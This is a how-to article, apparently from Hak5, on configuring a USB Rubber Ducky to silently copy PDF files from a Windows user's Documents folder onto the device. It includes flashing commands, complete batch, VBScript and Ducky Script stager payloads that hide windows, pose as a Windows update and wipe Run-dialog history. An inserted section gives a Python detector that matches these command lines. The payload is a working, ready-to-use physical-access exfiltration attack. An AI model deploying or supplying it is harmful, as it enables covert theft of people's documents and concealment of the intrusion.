Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained

As a keystroke injection attack tool capable of mimicking both a USB keyboard and mass storage, the USB Rubber Ducky excels at autonomously exfiltrating documents – or what we like to call performing an involuntary backup. In this article I will briefly outline the steps necessary to turn your USB Rubber Ducky into a document exfiltration machine, as described on Hak5 episodes 2112, 2113 and 2114.

What the Duck?

If you’re new to the USB Rubber Ducky, it is the original keystroke injection attack tool. That means while it looks like a USB Drive, it acts like a keyboard – typing over 1000 words per minute. Specially crafted payloads like these mimic a trusted user, entering keystrokes into the computer at superhuman speed. Once developed, anyone with social engineering or physical access skills can deploy these payloads with ease. Since computers trust humans, and inherently keyboards, computers trust the USB Rubber Ducky. So let’s go violate this trust…

You will need

Flash your USB Rubber Ducky to the “Twin Duck” firmware

Either using the dfu-programmer command and c_duck_v2.1.hex manually, or the ducky-flasher tool, flash the USB Rubber Ducky with this “Twin Duck” firmware from Midnightsnake to enable both USB HID Keyboard and USB Mass Storage. Begin by firmly holding down the micro push button on the USB Rubber Ducky while plugging it into your Linux computer and keep it held for around 5 seconds after connection. Then either run the ducky-flasher tool and follow the wizard, or use the dfu-programmer to manually erase, flash and reset the device.

sudo dfu-programmer at32uc3b1256 erase
sudo dfu-programmer at32uc3b1256 flash --suppress-bootloader-mem c_duck_v2.1.hex
sudo dfu-programmer at32uc3b1256 reset

Rename the Micro SD card volume label to “_”

Using gparted or Windows Explorer, rename the USB Rubber Ducky’s Micro SD card volume label to “_” (sans quotes). This will save characters and thus make our stager payload faster. The easiest way to rename the volume label is from Windows Explorer. From “My Computer” select the drive and press F2. Type _ and press enter. Done.

Copy the staged payload to the root of the newly renamed Micro SD card

You’ll need 3 files and 1 directory — d.cmd, e.cmd, i.vbs and a “slurp” directory. Our stager will execute d.cmd from the root of the drive with the volume name “_”. In this case d.cmd will invisibly execute e.cmd using the i.vbs.

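d.cmd

@echo off
REM Blink CAPSLOCK to signal that the payload has started
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
REM %~d0 = drive letter of this batch file; run e.cmd through i.vbs so no window is shown
cscript %~d0\i.vbs %~d0\e.cmd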

e.cmd

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory comprised of computer name, date and time
REM %~d0 = drive letter of this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
)

REM Blink CAPSLOCK again to signal that the copy has finished
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"


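i.vbs

' Run the file given as the first argument with a hidden window (0) and do not wait for it (False)
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False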

Finally, create the slurp directory on the root of the Micro SD card labeled “_”.

Encode the stager payload

Now that the firmware is flashed and the staged files are in place, we’re ready to set up the stager. This will be a very quickly executing ducky script which calls the files on the Mass Storage drive in order to copy files from the user’s Documents folder.

REM USB Exfiltration Payload from Hak5 episodes 2112 - 2114
REM Target: Windows XP SP3+ Author: Hak5Darren Props: Diggster, Midnightsnake
DELAY 1000
STRING powershell ".((gwmi win32_volume -f 'label=''_''').Name+'d.cmd')"

Save this as a standard ASCII text file ready to be encoded by any number of the Ducky Script Encoders, such as the command line Java encoder, the GUI Java encoder, the command line Python encoder/decoder or the Online Ducky Script Encoder.

Finally copy the resulting inject.bin file to the root of the Micro SD card. You should now have 4 files and 1 directory on the root — inject.bin, d.cmd, e.cmd, i.vbs and the slurp directory.

That’s it! Plug the newly configured USB Rubber Ducky with the Exfiltration payload into the target machine and in seconds it will begin invisibly copying files from the user’s Documents directory. Of course all of this can be customized and configured by altering the cmd files on the root of the Micro SD card. By default PDF files will be copied to the slurp directory in a new directory named after the hostname and US date and time stamp. Enjoy!
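Seen from the defender's side, the chain described above leaves a distinctive process-creation trail. The sketch below is an added example, not part of the original article or Hak5's code: it runs a few command-line rules over constructed log events and flags a host where the volume-label launch is followed by later stages. The rule names, the event tuple layout and the C: system drive are assumptions made for the example.

```python
import re

SYSTEM_DRIVE = "c"  # assumption: Windows lives on C:

# Regexes over process command lines as process-creation logging records
# them (variables already expanded by cmd.exe). Rule names are made up here.
RULES = {
    # PowerShell resolving a drive by volume label, then running a script on it
    "volume_label_launch": re.compile(
        r"(gwmi|get-wmiobject|get-ciminstance)\s+win32_volume.*label=.*\.(cmd|bat|ps1)", re.I),
    # Run-dialog history deleted
    "runmru_wipe": re.compile(r"\breg(\.exe)?\s+delete\s+.*\\Explorer\\RunMRU", re.I),
    # CAPSLOCK toggled from a script (used by the payload as a status light)
    "capslock_signal": re.compile(r"SendKeys\('\{CAPSLOCK\}'\)", re.I),
}
SCRIPT_HOST = re.compile(r"\b[cw]script(\.exe)?\s+([a-z]):\\\S*\.vbs", re.I)
XCOPY = re.compile(
    r"\bxcopy(\.exe)?\s+(?:/\w+\s+)*([a-z]):\\\S*\\Documents\\\S*\s+([a-z]):\\", re.I)

def match_rules(cmdline):
    """Return the names of every rule that one command line triggers."""
    hits = {name for name, rx in RULES.items() if rx.search(cmdline)}
    m = SCRIPT_HOST.search(cmdline)
    if m and m.group(2).lower() != SYSTEM_DRIVE:  # script host fed from another drive
        hits.add("script_host_non_system_drive")
    m = XCOPY.search(cmdline)
    if m and m.group(2).lower() != m.group(3).lower():  # Documents copied across drives
        hits.add("documents_copied_off_drive")
    return hits

def triage(events, window=60):
    """Flag hosts where the label lookup is followed by another stage in time."""
    start, seen = {}, {}
    for ts, host, cmd in sorted(events):
        hits = match_rules(cmd)
        if "volume_label_launch" in hits:
            start.setdefault(host, ts)
        if host in start and ts - start[host] <= window:
            seen.setdefault(host, set()).update(hits)
    return {h: sorted(r) for h, r in seen.items() if len(r) >= 2}

SAMPLE = [  # constructed events: (seconds, host, command line)
    (0, "WS01", "powershell \".((gwmi win32_volume -f 'label=''_''').Name+'d.cmd')\""),
    (1, "WS01", r"C:\Windows\System32\cscript.exe E:\i.vbs E:\e.cmd"),
    (2, "WS01", r"reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f"),
    (3, "WS01", r"xcopy /C /Q /G /Y /S C:\Users\alice\Documents\*.pdf E:\slurp\WS01_20240115_093012"),
    (9, "WS01", "powershell.exe -WindowStyle Hidden -command \"$wsh.SendKeys('{CAPSLOCK}')\""),
    (4, "WS02", r"cscript C:\Windows\System32\slmgr.vbs /dlv"),
    (5, "WS02", r"xcopy /S C:\Users\bob\Documents\*.pdf C:\Backup"),
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE).items():
        print(host, rules)
```

Requiring two or more distinct rules after the label lookup keeps routine same-drive backups and system scripts, like the WS02 events, from raising a flag.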

What next?

Now that you’ve created a USB Rubber Ducky capable of exfiltrating documents, perhaps you’d like to check out some other popular payloads – like the 3 Second Reverse Shell with a USB Rubber Ducky, or Pilfering Passwords with the USB Rubber Ducky – a 15 Second Password Hack, Mr Robot Style. Now go forth and duck ’em!
